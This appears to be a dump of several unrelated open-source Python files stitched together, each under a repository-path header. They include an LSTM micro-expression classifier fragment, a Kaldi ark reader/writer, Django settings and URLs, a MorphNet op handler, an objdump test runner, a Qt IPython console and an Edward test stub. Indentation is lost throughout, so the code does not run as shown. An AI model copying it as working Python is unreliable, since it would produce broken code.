n_exp=5
VidPerSubject = [9,13,7,5,19,5,9,3,13,13,10,12,8,4,3,4,34,3,15,11,2,2,12,7,7,16]
IgnoredSamples=['sub09/EP13_02/','sub09/EP02_02f/','sub10/EP13_01/','sub17/EP15_01/',
'sub17/EP15_03/','sub19/EP19_04/','sub24/EP10_03/','sub24/EP07_01/',
'sub24/EP07_04f/','sub24/EP02_07/','sub26/EP15_01/']
listOfIgnoredSamples=[]
for s in range(len(IgnoredSamples)):
if s==0:
listOfIgnoredSamples=[inputDir+IgnoredSamples[s]]
else:
listOfIgnoredSamples.append(inputDir+IgnoredSamples[s])
elif dB == "SMIC":
inputDir="/srv/oyh/DataBase/SMIC/HS_naming_modified/"
wb=xlrd.open_workbook('/srv/oyh/DataBase/SMIC_label.xlsx');
ws=wb.sheet_by_index(0)
colm=ws.col_slice(colx=1,start_rowx=1,end_rowx=None)
vidName=[str(x.value) for x in colm]
colm=ws.col_slice(colx=2,start_rowx=1,end_rowx=None)
expression=[int(x.value) for x in colm]
table=np.transpose(np.array([np.array(vidName),np.array(expression)],dtype=str))
samples=164; #6 samples are excluded
subjects=16;
n_exp=3;
r= 170;w=140;
VidPerSubject = [6,6,39,19,2,4,13,4,7,9,10,10,4,7,2,22];
listOfIgnoredSamples=[];
resizedFlag=1;
else:
print("NOT in the selection.")
######### Reading in the input images ########
SubperdB=[]
for sub in sorted([infile for infile in os.listdir(inputDir)]):
VidperSub=[]
for vid in sorted([inrfile for inrfile in os.listdir(inputDir+sub)]):
path=inputDir + sub + '/'+ vid + '/'
if path in listOfIgnoredSamples:
continue
# print(dB)
# print(path)
imgList=readinput(path,dB)
numFrame=len(imgList)
if resizedFlag ==1:
col=w
row=r
else:
img=cv2.imread(imgList[0])
[row,col,_l]=img.shape
## ##read the label for each input video
collectinglabel(table, sub[3:], vid, workplace+'Classification/', dB)
for var in range(numFrame):
img=cv2.imread(imgList[var])
[_,_,dim]=img.shape
if dim ==3:
img=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
if resizedFlag ==1:
#in resize function, [col,row]
img=cv2.resize(img,(col,row))
if var==0:
FrameperVid=img.flatten()
else:
FrameperVid=np.vstack((FrameperVid,img.flatten()))
VidperSub.append(FrameperVid)
SubperdB.append(VidperSub)
##### Setting up the LSTM model ########
data_dim=r*w # 2500
print(data_dim)
timesteps=10
# LSTM1 = LSTM(2500, return_sequences=True, input_shape=(timesteps, data_dim))
model=Sequential()
# model.add(TimeDistributed(Dense(data_dim), input_shape=(timesteps, data_dim)))
model.add(LSTM(2500, return_sequences=True, input_shape=(timesteps, data_dim)))
model.add(LSTM(500,return_sequences=False))
##model.add(LSTM(500,return_sequences=True))
##model.add(LSTM(50,return_sequences=False))
model.add(Dense(50,activation='sigmoid'))
model.add(Dense(5,activation='sigmoid'))
model.compile(loss='categorical_crossentropy',optimizer='Adam',metrics=[metrics.categorical_accuracy])
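# Architecture recap (descriptive comment only): input of shape (timesteps=10, data_dim=r*w)
# -> LSTM(2500, return_sequences=True) -> LSTM(500) -> Dense(50, sigmoid) -> Dense(5, sigmoid),
# optimized with Adam on categorical cross-entropy.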
#### generate the label based on subjects #########
label=np.loadtxt(workplace+'Classification/'+ dB +'_label.txt')
labelperSub=[]
counter = 0
for sub in range(subjects):
numVid=VidPerSubject[sub]
labelperSub.append(label[counter:counter+numVid])
counter = counter + numVid
##print(np.shape(labelperSub[1]))
##print(labelperSub[1])
######## Separating the input files into LOSO CV ########
tot_mat=np.zeros((n_exp,n_exp))
for sub in range(subjects):
Train_X=[]
Train_Y=[]
Test_X=SubperdB[sub]
Test_X=np.array(Test_X)
Test_Y=labelperSub[sub]
Test_Yy=np_utils.to_categorical(Test_Y,5)
print(Test_Y)
## print(np.shape(Test_Y))
if sub==0:
for i in range(1,subjects):
Train_X.append(SubperdB[i])
Train_Y.append(labelperSub[i])
elif sub==subjects-1:
for i in range(subjects-1):
Train_X.append(SubperdB[i])
Train_Y.append(labelperSub[i])
else:
for i in range(subjects):
if sub == i:
continue
else:
Train_X.append(SubperdB[i])
Train_Y.append(labelperSub[i])
# print(Train_X)
# Train_X=np.hstack(Train_X)
# print(Train_X.shape)
Train_X=np.vstack(Train_X) # changed to hstack from vstack
# print(Train_X.shape)
# Train_X = Train_X.shape[1:]
# print(Train_X.shape)
# Train_X = np.expand_dims(Train_X, axis=2)
# Train_X = np.reshape(Train_X, Train_X.shape + (1, 1,) )
# Train_X = np.reshape( Train_X, Train_X.shape )
# Train_X = np.reshape(2500, 16077)
print(Train_X.shape)
Train_Y=np.hstack(Train_Y)
Train_Y=np_utils.to_categorical(Train_Y,5)
print (np.shape(Train_Y))
print (np.shape(Train_X))
print (np.shape(Test_Y))
print (np.shape(Test_X))
model.fit(Train_X, Train_Y, validation_split=0.05, epochs=1, batch_size=20)
model.summary()
predict=model.predict_classes(Test_X)
## predict[predict>= 0.5] = 1
## predict[predict<0.5] = 0
print (predict)
print (Test_Y)
#compute the ConfusionMat
ct=confusion_matrix(Test_Y,predict)
#check the order of the CT
order=np.unique(np.concatenate((predict,Test_Y)))
#create an array to hold the CT for each CV
mat=np.zeros((n_exp,n_exp))
#put the order accordingly, in order to form the overall ConfusionMat
for m in range(len(order)):
for n in range(len(order)):
mat[int(order[m]),int(order[n])]=ct[m,n]
tot_mat=mat+tot_mat
# write each CT of each CV into .txt file
if not os.path.exists(workplace+'Classification/'+'Result/'+dB+'/'):
os.mkdir(workplace+'Classification/'+ 'Result/'+dB+'/')
with open(workplace+'Classification/'+ 'Result/'+dB+'/sub_CT.txt','a') as csvfile:
thewriter=csv.writer(csvfile, delimiter=' ')
thewriter.writerow('Sub ' + str(sub+1))
thewriter=csv.writer(csvfile,dialect=csv.excel_tab)
for row in ct:
thewriter.writerow(row)
thewriter.writerow(order)
thewriter.writerow('\n')
if sub==subjects-1:
# compute the accuracy, F1, P and R from the overall CT
microAcc=np.trace(tot_mat)/np.sum(tot_mat)
[f1,p,r]=fpr(tot_mat,n_exp)
# save into a .txt file
with open(workplace+'Classification/'+ 'Result/'+dB+'/final_CT.txt','w') as csvfile:
thewriter=csv.writer(csvfile,dialect=csv.excel_tab)
for row in tot_mat:
thewriter.writerow(row)
thewriter=csv.writer(csvfile, delimiter=' ')
thewriter.writerow('micro:' + str(microAcc))
thewriter.writerow('F1:' + str(f1))
thewriter.writerow('Precision:' + str(p))
thewriter.writerow('Recall:' + str(r))
|
btk20_src/lib/pykaldiarkio.py | musiclvme/distant_speech_recognition | 136 | 12797664 | <reponame>musiclvme/distant_speech_recognition<filename>btk20_src/lib/pykaldiarkio.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# MIT License
#
# Copyright (c) 2018 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Basic classes to read/write a binary Kaldi ark file
"""
import struct, numpy
BFM_SYM = b'BFM '
BIV_SYM = b'B'
FEAT_BYTE_SIZE = b'\x04'
NULLC = b'\0'
WAV_SYM = b'RIFF'
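# Record layouts assumed by the readers/writers below (one record per utterance, little-endian):
#   feature matrix : "<uttid> " + b'\0BFM ' + b'\x04' + rows(int32) + b'\x04' + cols(int32) + float32 data
#   int vector     : "<uttid> " + b'\0B'    + b'\x04' + length(int32) + (b'\x04' + int32) per element
#   wav            : "<uttid> " + 44-byte RIFF header + int16 samples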
class KaldiArkReader:
"""
Base class for reading a Kaldi ark file
"""
def __init__(self, store_image=False):
"""
Constructor of KaldiArkReader
:params store_image: Every utterance data in the ark file will be kept in RAM if True
"""
self.arkfp = None
self.curr_arkfile = None
if store_image == True:# store all the utterance data into image
self.arkdata = {} # arkdata[ID] = {matrix|vector}
self.uttids = [] # remember the order of utterance IDs in an ark file
else:
self.arkdata = None
self.uttids = None
def __enter__(self):
return self
def __iter__(self):
"""
Read each utterance from the ark file and return it
:returns : Python dictionary that contains the utterance ID as a key and data as a value
"""
raise NotImplementedError('Implement this')
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def accumulate(self, uttid, dataelem):
"""
Store all the utterance data in RAM if this reader was constructed with store_image=True.
"""
if self.arkdata is None:
self.arkdata = {}
self.uttids = []
self.arkdata[uttid] = dataelem
self.uttids.append(uttid)
def open(self, arkfile):
"""
Set the ark file to be read later
"""
if self.arkfp is not None:
raise IOError('call close() first')
self.arkfp = open(arkfile, 'rb')
self.curr_arkfile = arkfile
def close(self):
"""
Close the file pointer if it is opened
"""
if self.arkfp is not None:
self.arkfp.close()
self.arkfp = None
self.curr_arkfile = None
if self.arkdata is not None:
self.arkdata = {}
self.uttids = []
def seek(self, position_in_bytes):
"""
Skip the file pointer. You can pick up the file position from .scp file
"""
if self.arkfp is not None:
self.arkfp.seek(position_in_bytes, 0)
class KaldiFeatArkReader(KaldiArkReader):
"""
Read a Kaldi .feat.ark file per utterance iteratively
"""
def __init__(self, store_image=False):
KaldiArkReader.__init__(self, store_image)
def __iter__(self):
"""
Return a tuple of an utterance ID and feature matrix
where each row vector corresponds to the feature vector of one frame
:returns: (string, numpy.matrix)
"""
uttid = b''
while True:
arkdata = self.arkfp.read(1)
if arkdata == b'':
raise StopIteration('End of feat ark file')
c = struct.unpack('<s', arkdata)[0]
if c == b' ':
arkdata = self.arkfp.read(1) # skip '\0'
arkdata = self.arkfp.read(4) # read the end symbol 'BFM '
endSym = struct.unpack('<4s', arkdata)[0]
if endSym != BFM_SYM:
raise ValueError('ERROR: %s could not find BFM but %s' %(self.curr_arkfile, endSym))
arkdata = self.arkfp.read(1) # skip one byte data '\x04'
arkdata = self.arkfp.read(4) # read no. frames
frameN = struct.unpack( '<I', arkdata )[0]
arkdata = self.arkfp.read(1) # skip one byte data '\x04'
arkdata = self.arkfp.read(4) # read the dimension
featD = struct.unpack( '<I', arkdata )[0]
coeffN = frameN * featD
# read the coefficients
arkdata = self.arkfp.read(coeffN * 4)
feMat = numpy.reshape(struct.unpack('<%df' %(coeffN), arkdata), (frameN,featD))
uttid = uttid.decode()
if self.arkdata is not None:
self.accumulate(uttid, feMat)
uttid2data = {uttid:feMat}
uttid = b''
yield uttid2data
else:
uttid += c
class KaldiIntVectorArkReader(KaldiArkReader):
"""
Read a Kaldi integer-vector file per utterance iteratively
"""
def __init__(self, store_image=False):
KaldiArkReader.__init__(self, store_image)
def __iter__(self):
"""
Return a tuple of an utterance ID and vector
:returns: (string, numpy.vector)
"""
uttid = b''
while True:
arkdata = self.arkfp.read(1)
if arkdata == b'':
break
c = struct.unpack('<s', arkdata)[0]
if c == b' ':
arkdata = self.arkfp.read(1) # skip '\0'
arkdata = self.arkfp.read(1) # read the end symbol 'B'
endSym = struct.unpack('<s', arkdata)[0]
if endSym != BIV_SYM:
raise ValueError('ERROR: %s: Unmatched symbol %s!=%s' %(self.curr_arkfile, endSym, BIV_SYM))
arkdata = self.arkfp.read(1) # skip one byte data '\x04'
arkdata = self.arkfp.read(4) # read no. frames
frameN = struct.unpack('<i', arkdata)[0]
# read the coefficients
vals = []
for i in range(frameN):
arkdata = self.arkfp.read(1)
arkdata = self.arkfp.read(4)
vals.append(struct.unpack('<i', arkdata)[0])
intVec = numpy.array(vals)
uttid = uttid.decode()
if self.arkdata is not None:
self.accumulate(uttid, intVec)
uttid2data = {uttid:intVec}
uttid = b''
yield uttid2data
else:
uttid += c
class KaldiWavArkReader(KaldiArkReader):
"""
Read a Kaldi .wav.ark file per utterance iteratively
"""
def __init__(self, store_image=False):
KaldiArkReader.__init__(self, store_image)
self.riff_header = None
self.samplerate = None
self.num_channels = None
def get_riff_header(self):
return self.riff_header
def get_samplerate(self):
return self.samplerate
def get_num_channel(self):
return self.num_channels
def __iter__(self):
"""
Return a tuple of an utterance ID and audio samples as a 16-bit integer vector
:returns: (string, numpy.int16 vector)
"""
uttid = b''
while True:
arkdata = self.arkfp.read(1)
if arkdata == b'':
raise StopIteration('End of wav ark file')
c = struct.unpack('<s', arkdata)[0]
if c == b' ':
# read the 44 Byte header block of the RIFF file
riff_header = self.arkfp.read(44)
endSym = struct.unpack('<4s',riff_header[0:4])[0]
dataLength = struct.unpack('<L', riff_header[40:44])[0]
bitsPerSample = struct.unpack('<h', riff_header[34:36])[0]
# nsamps = int(dataLength / (bitsPerSample/8)) # divide 2 (Byte)
self.samplerate = struct.unpack('<L', riff_header[24:28])[0]
self.num_channels = struct.unpack('<h', riff_header[22:24])[0]
if endSym != WAV_SYM:
raise ValueError('ERROR: %s: could not find %s but %s' %(self.curr_arkfile, WAV_SYM, endSym))
if bitsPerSample != 16:
raise ValueError('ERROR: %s: expecting utterance with int16 format but %d bits per sample.' % (self.curr_arkfile, bitsPerSample))
uttBinary = self.arkfp.read(dataLength)
# expecting 16 bit per sample
uttInt = [struct.unpack('<h', uttBinary[i:i+2]) for i in numpy.arange(0,len(uttBinary), 2)]
samples = numpy.array(numpy.int16(numpy.resize(uttInt, (len(uttInt),))))
self.riff_header = riff_header
uttid = uttid.decode()
if self.arkdata is not None:
self.accumulate(uttid, samples)
uttid2data = {uttid:samples}
uttid = b''
yield uttid2data
else:
uttid += c
class KaldiArkWriter:
"""
Base class for writing a Kaldi ark file
"""
def __init__(self):
self.arkfp = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def open(self, arkfile):
if self.arkfp is not None:
raise IOError('call close() first')
self.arkfp = open(arkfile, 'wb')
def close(self):
if self.arkfp is not None:
self.arkfp.close()
self.arkfp = None
class KaldiFeatArkWriter(KaldiArkWriter):
"""
Write utterance data as a Kaldi .feat.ark file
"""
def __init__(self):
KaldiArkWriter.__init__(self)
def write(self, uttid2feats, uttids=None):
if uttids is None:
uttids = list(uttid2feats.keys())
for uttid in uttids:
feMat = uttid2feats[uttid]
frameN = len(feMat)
featD = len(feMat[0])
outData = b''
for c in uttid + ' ':
outData += struct.pack('<c', c.encode())
outData += struct.pack('<c', NULLC)
for c in BFM_SYM.decode():
outData +=struct.pack('<c', c.encode())
outData += struct.pack('<c', FEAT_BYTE_SIZE)
outData += struct.pack('<I', frameN)
outData += struct.pack('<c', FEAT_BYTE_SIZE)
outData += struct.pack('<I', featD)
self.arkfp.write(outData)
outData = b''
for frameX in range(frameN):
for coeff in feMat[frameX]:
outData += struct.pack('<f', coeff)
self.arkfp.write(outData)
self.arkfp.flush()
class KaldiIntVectorArkWriter(KaldiArkWriter):
"""
Write utterance data as a Kaldi int-vector ark file
"""
def __init__(self):
KaldiArkWriter.__init__(self)
def write(self, uttid2feats, uttids=None):
if uttids is None:
uttids = list(uttid2feats.keys())
for uttid in uttids:
intVec = uttid2feats[uttid]
# write data header
frameN = len(intVec)
outData = b''
for c in uttid + ' ':
outData += struct.pack('<c', c.encode())
outData += struct.pack('<c', NULLC)
for c in BIV_SYM.decode():
outData +=struct.pack('<c', c.encode())
outData += struct.pack('<c', FEAT_BYTE_SIZE)
outData += struct.pack('<I', frameN)
self.arkfp.write(outData)
# write actual vector data
outData = b''
for coeff in intVec:
outData += struct.pack('<c', FEAT_BYTE_SIZE)
outData += struct.pack('<i', coeff)
self.arkfp.write(outData)
self.arkfp.flush()
def correct_chunk_size(numSamples, riff_header):
"""
Correct the data length in header information; see http://soundfile.sapp.org/doc/WaveFormat/ for details
"""
bytesPerSample = struct.unpack( '<h', riff_header[34:36] )[0] // 8
dataLength = numSamples * bytesPerSample
totalChunkSize = 36 + dataLength
return (riff_header[0:4] + struct.pack('<L', totalChunkSize) + riff_header[8:40] + struct.pack('<L', dataLength) + riff_header[44:])
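# Example (illustrative numbers): 8000 samples of 16-bit audio give dataLength = 16000 bytes
# and a total RIFF chunk size of 36 + 16000 = 16036.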
class KaldiWavArkWriter(KaldiArkWriter):
"""
Write utterance data as a Kaldi .wav.ark file
"""
def __init__(self):
KaldiArkWriter.__init__(self)
def write(self, uttid2feats, uttid2headers, uttids=None):
if uttids is None:
uttids = list(uttid2feats.keys())
for uttid in uttids:
outData = b''
for c in uttid + ' ':
outData += struct.pack('<c', c.encode())
self.arkfp.write(outData)
samples = uttid2feats[uttid]
# write the corrected header information
uttid2header = correct_chunk_size(len(samples), uttid2headers[uttid])
self.arkfp.write(uttid2header)
outData = b''
for samp in samples:
outData += struct.pack('<h', samp)
self.arkfp.write(outData)
self.arkfp.flush()
def dump_riff_file(self, riff_file, uttid):
"""
Dump the data in a RIFF file into the wav ark file
"""
outData = b''
for c in uttid + ' ':
outData += struct.pack('<c', c.encode())
self.arkfp.write(outData)
with open(riff_file, 'rb') as riffF:
self.arkfp.write(riffF.read())
self.arkfp.flush()
def test():
import argparse
def build_parser():
parser = argparse.ArgumentParser(description='List utterance IDs in the ark file')
parser.add_argument('-t', '--type', default='f', help='Ark file type (i/f/w)')
parser.add_argument('input_ark', help='input ark path')
parser.add_argument('output_ark', help='output ark path')
return parser
parser = build_parser()
args, argv = parser.parse_known_args()
if args.type == 'f':
reader = KaldiFeatArkReader()
writer = KaldiFeatArkWriter()
elif args.type == 'w':
reader = KaldiWavArkReader()
writer = KaldiWavArkWriter()
else:
reader = KaldiIntVectorArkReader()
writer = KaldiIntVectorArkWriter()
reader.open(args.input_ark)
writer.open(args.output_ark)
for uttid2data in reader:
print(('uttid: %s' %list(uttid2data.keys())[0]))
if args.type == 'w':
writer.write(uttid2data, {list(uttid2data.keys())[0]:reader.get_riff_header()})
else:
writer.write(uttid2data)
reader.close()
writer.close()
if __name__ == '__main__':
test()
|
apps/paypal/urls.py | youssriaboelseod/pyerp | 115 | 12797687 | # Django Library
from django.urls import path
# Localfolder Library
from .views.paypal_config import UpdatePaypalConfigView
# http://www.secnot.com/django-shop-paypal-rest-1.html
app_name = 'paypal'
urlpatterns = [
path('paypal-config/<int:pk>', UpdatePaypalConfigView.as_view(), name='paypal-config'),
]
|
glucosetracker/settings/production.py | arhanair/glucose-tracker-monitor | 134 | 12797702 | from .base import *
DEBUG = False
TEMPLATE_DEBUG = DEBUG
# Use the cached template loader so template is compiled once and read from
# memory instead of reading from disk on each load.
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ['.glucosetracker.net']
# Make this unique, and don't share it with anybody.
SECRET_KEY = os.environ['DJANGO_SECRET_KEY']
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'glucosetracker',
'USER': os.environ['DATABASE_USER'],
'PASSWORD': os.environ['DATABASE_PASSWORD'],
'HOST': 'localhost',
'PORT': '',
}
}
# 3rd-party apps tracking IDs.
INTERCOM_APP_ID = 'a6d0326564469dfd7f7d9b1bfc909ee3815a85a8'
GOOGLE_ANALYTICS_TRACKING_ID = 'UA-45698014-1'
ADDTHIS_PUBLISHER_ID = 'ra-52fffdf9456ec7d2'
# The 'From:' header of admin-related emails.
DEFAULT_FROM_EMAIL = '<EMAIL>'
ADMINS = (
('Local Admin', '<EMAIL>'),
)
MANAGERS = ADMINS
CONTACTS = {
'support_email': 'GlucoseTracker.net <<EMAIL>>',
'admin_email': '<EMAIL>',
'info_email': 'GlucoseTracker.net <<EMAIL>>',
}
# Subscribers app settings
SEND_SUBSCRIBERS_EMAIL_CONFIRMATION = True
# Django-storages settings
DEFAULT_FILE_STORAGE = 'core.s3utils.MediaRootS3BotoStorage'
AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']
AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
AWS_STORAGE_BUCKET_NAME = 'glucosetracker-assets'
AWS_QUERYSTRING_AUTH = False
MEDIA_URL = '//%s.s3.amazonaws.com/%s/' % (AWS_STORAGE_BUCKET_NAME, MEDIA_ROOT) |
morph_net/framework/output_non_passthrough_op_handler.py | MohammadChalaki/morph-net | 1,061 | 12797706 | <gh_stars>1000+
"""OpHandler for OutputNonPassthrough ops.
OutputNonPassthrough ops take their regularizer from the output and do not
passthrough the regularizer to their input. This is the default OpHandler for
ops like Conv2D and MatMul when L1-gamma regularization is used.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from morph_net.framework import op_handler
from morph_net.framework import op_handler_util
class OutputNonPassthroughOpHandler(op_handler.OpHandler):
"""OpHandler implementation for OutputNonPassthrough operations.
These ops take their regularizer from the output and do not
pass the regularizer through to their input.
"""
@property
def is_source_op(self):
return False
@property
def is_passthrough(self):
return False
def assign_grouping(self, op, op_reg_manager):
"""Assign grouping to the given op and updates the manager.
Args:
op: tf.Operation to assign grouping to.
op_reg_manager: OpRegularizerManager to keep track of the grouping.
"""
# Check if all input ops have groups, or tell the manager to process them.
input_ops = op_handler_util.get_input_ops(op, op_reg_manager)
input_ops_without_group = op_handler_util.get_ops_without_groups(
input_ops, op_reg_manager)
# Check if all output ops have groups, or tell the manager to process them.
output_ops = op_handler_util.get_output_ops(op, op_reg_manager)
output_ops_without_group = op_handler_util.get_ops_without_groups(
output_ops, op_reg_manager)
# Remove non-passthrough ops from outputs ops to group with.
output_ops = op_handler_util.remove_non_passthrough_ops(
output_ops, op_reg_manager)
# Only group with ops that have the same size. Process the ops that have
# mismatched size.
output_ops_to_group, output_ops_to_process = (
op_handler_util.separate_same_size_ops(op, output_ops))
# Also process ungrouped ops.
input_ops_to_process = input_ops_without_group
output_ops_to_process.extend(output_ops_without_group)
# Align op slice sizes if needed.
op_slices = op_reg_manager.get_op_slices(op)
output_op_slices = op_handler_util.get_op_slices(
output_ops_to_group, op_reg_manager)
aligned_op_slice_sizes = op_handler_util.get_aligned_op_slice_sizes(
op_slices, [], output_op_slices)
op_handler_util.reslice_ops([op] + output_ops_to_group,
aligned_op_slice_sizes, op_reg_manager)
# TODO(a1): Consider refactoring this method.
# Repopulate OpSlice data, as ops may have been resliced.
output_op_slices = self._get_output_op_slices(
output_ops_to_group, op_reg_manager)
# Group with inputs and outputs.
op_handler_util.group_op_with_inputs_and_outputs(
op, [], output_op_slices, aligned_op_slice_sizes,
op_reg_manager)
# Reprocess ops.
op_reg_manager.process_ops(output_ops_to_process + input_ops_to_process)
def _group_with_output_slices(
self, op, output_op_slices, op_slices, op_reg_manager):
"""Groups OpSlice of current op with output ops.
Assuming OpSlice of op have been aligned with output, groups the
corresponding OpSlice.
Args:
op: tf.Operation to determine grouping for.
output_op_slices: List of list of OpSlice, with a list per output op.
op_slices: List of OpSlice for current op.
op_reg_manager: OpRegularizerManager to keep track of grouping.
Raises:
ValueError: If sizes for current and output op slices are not the same.
"""
# Assert that op slices for output and current op are aligned.
output_op_slices_sizes = op_handler_util.get_op_slice_sizes(
output_op_slices)
op_slice_sizes = op_handler_util.get_op_slice_sizes([op_slices])
if op_slice_sizes != output_op_slices_sizes:
raise ValueError('Current op and output op have differing slice '
'sizes: {}, {}'.format(
op_slice_sizes, output_op_slices_sizes))
op_handler_util.group_op_with_inputs_and_outputs(
op, [], output_op_slices, op_slice_sizes, op_reg_manager)
def _get_output_op_slices(self, output_ops, op_reg_manager):
"""Returns op slices for outputs.
Args:
output_ops: List of tf.Operation.
op_reg_manager: OpRegularizerManager to keep track of the grouping.
Returns:
A list of list of OpSlice with a list per output op.
"""
return op_handler_util.get_op_slices(output_ops, op_reg_manager)
def create_regularizer(self, _):
raise NotImplementedError('Not a source op.')
|
native_client/src/trusted/validator_ragel/check_dis_section.py | zipated/src | 2,151 | 12797737 | <reponame>zipated/src
#!/usr/bin/python
# Copyright (c) 2013 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import subprocess
import sys
import tempfile
import objdump_parser
import test_format
class RdfaTestRunner(test_format.TestRunner):
SECTION_NAME = 'dis'
def CommandLineOptions(self, parser):
parser.add_option('--objdump',
help='Path to objdump')
def GetSectionContent(self, options, sections):
arch = {32: '-Mi386', 64: '-Mx86-64'}[options.bits]
data = ''.join(test_format.ParseHex(sections['hex']))
# TODO(shcherbina): get rid of custom prefix once
# https://code.google.com/p/nativeclient/issues/detail?id=3631
# is actually fixed.
tmp = tempfile.NamedTemporaryFile(
prefix='tmprdfa_', mode='wb', delete=False)
try:
tmp.write(data)
tmp.close()
objdump_proc = subprocess.Popen(
[options.objdump,
'-mi386', arch, '--target=binary',
'--disassemble-all', '--disassemble-zeroes',
'--insn-width=15',
tmp.name],
stdout=subprocess.PIPE,
# On Windows, builds of binutils based on Cygwin end lines with
# \n while builds of binutils based on MinGW end lines with \r\n.
# The 'universal_newlines' feature makes this work with either one.
universal_newlines=True)
result = ''.join(objdump_parser.SkipHeader(objdump_proc.stdout))
return_code = objdump_proc.wait()
assert return_code == 0, 'error running objdump'
finally:
tmp.close()
os.remove(tmp.name)
return result
def main(argv):
RdfaTestRunner().Run(argv)
if __name__ == '__main__':
main(sys.argv[1:])
|
src/rayoptics/qtgui/ipyconsole.py | wuffi/ray-optics | 106 | 12797740 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright © 2018 <NAME>
""" Support creation of an iPython console, with rayoptics environment
.. Created on Wed Nov 21 21:48:02 2018
.. codeauthor: <NAME>
"""
from PyQt5.QtGui import QColor
from qtconsole.rich_jupyter_widget import RichJupyterWidget
from qtconsole.inprocess import QtInProcessKernelManager
from qtconsole import styles
from IPython.lib import guisupport
import qdarkstyle
from rayoptics.gui.appmanager import ModelInfo
from rayoptics.util import colors
default_template = '''\
QPlainTextEdit, QTextEdit {
background-color: %(bgcolor)s;
background-clip: padding;
color: %(fgcolor)s;
selection-background-color: %(select)s;
}
.inverted {
background-color: %(fgcolor)s;
color: %(bgcolor)s;
}
.error { color: red; }
.in-prompt { color: %(i_color)s; }
.in-prompt-number { font-weight: bold; }
.out-prompt { color: %(o_color)s; }
.out-prompt-number { font-weight: bold; }
'''
def create_ipython_console(gui_parent, opt_model, title, view_width, view_ht):
""" create a iPython console with a rayoptics environment """
def create_light_or_dark_callback(ipy_console):
# if not hasattr(ipy_console, 'background'):
# ipy_console.background = ipy_console.background()
def l_or_d(is_dark):
accent = colors.accent_colors(is_dark)
prompt_style = {
'i_color': accent['cyan'],
'o_color': accent['orange'],
}
if is_dark:
ipy_console.setStyleSheet(
qdarkstyle.load_stylesheet(qt_api='pyqt5'))
# color_defs = {**styles.get_colors('solarized-dark'),
# **prompt_style }
else:
ipy_console.setStyleSheet('')
# color_defs = {**styles.get_colors('solarized-light'),
# **prompt_style }
# ipy_console.style_sheet = default_template%color_defs
# ipy_console._style_sheet_changed()
return l_or_d
if opt_model:
ro_env = {
'gui_parent': gui_parent,
'app': gui_parent.app_manager,
'opm': opt_model,
'sm': opt_model.seq_model,
'osp': opt_model.optical_spec,
'pm': opt_model.parax_model,
'em': opt_model.ele_model,
'pt': opt_model.part_tree,
}
else:
ro_env = {
'gui_parent': gui_parent,
'app': gui_parent.app_manager,
}
ro_setup = 'from rayoptics.environment import *'
# construct the top level widget
ipy_console = ConsoleWidget()
# load the environment
ipy_console.execute_command(ro_setup)
ipy_console.push_vars(ro_env)
mi = ModelInfo(opt_model)
sub_window = gui_parent.add_subwindow(ipy_console, mi)
sub_window.setWindowTitle(title)
sub_window.sync_light_or_dark = create_light_or_dark_callback(ipy_console)
orig_x, orig_y = gui_parent.initial_window_offset()
sub_window.setGeometry(orig_x, orig_y, view_width, view_ht)
sub_window.show()
class ConsoleWidget(RichJupyterWidget):
def __init__(self, customBanner=None, *args, **kwargs):
super().__init__(*args, **kwargs)
if customBanner is not None:
self.banner = customBanner
self.font_size = 6
self.kernel_manager = kernel_manager = QtInProcessKernelManager()
kernel_manager.start_kernel(show_banner=False)
kernel_manager.kernel.gui = 'qt'
self.kernel_client = kernel_client = self.kernel_manager.client()
kernel_client.start_channels()
def stop():
kernel_client.stop_channels()
kernel_manager.shutdown_kernel()
guisupport.get_app_qt().exit()
self.exit_requested.connect(stop)
def push_vars(self, variableDict):
"""
Given a dictionary containing name / value pairs, push those variables
to the Jupyter console widget
"""
self.kernel_manager.kernel.shell.push(variableDict)
def clear(self):
"""
Clears the terminal
"""
self._control.clear()
# self.kernel_manager
def print_text(self, text):
"""
Prints some plain text to the console
"""
self._append_plain_text(text)
def execute_command(self, command):
"""
Execute a command in the frame of the console widget
"""
self._execute(command, False)
|
tests/util/test_transform.py | xiangze/edward | 5,200 | 12797755 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import edward as ed
import numpy as np
import tensorflow as tf
from collections import namedtuple
from edward.models import (
Beta, Dirichlet, DirichletProcess, Gamma, MultivariateNormalDiag,
Normal, Poisson, TransformedDistribution)
from tensorflow.contrib.distributions import bijectors
class test_transform_class(tf.test.TestCase):
def assertSamplePosNeg(self, sample):
num_pos = np.sum((sample > 0.0), axis=0, keepdims=True)
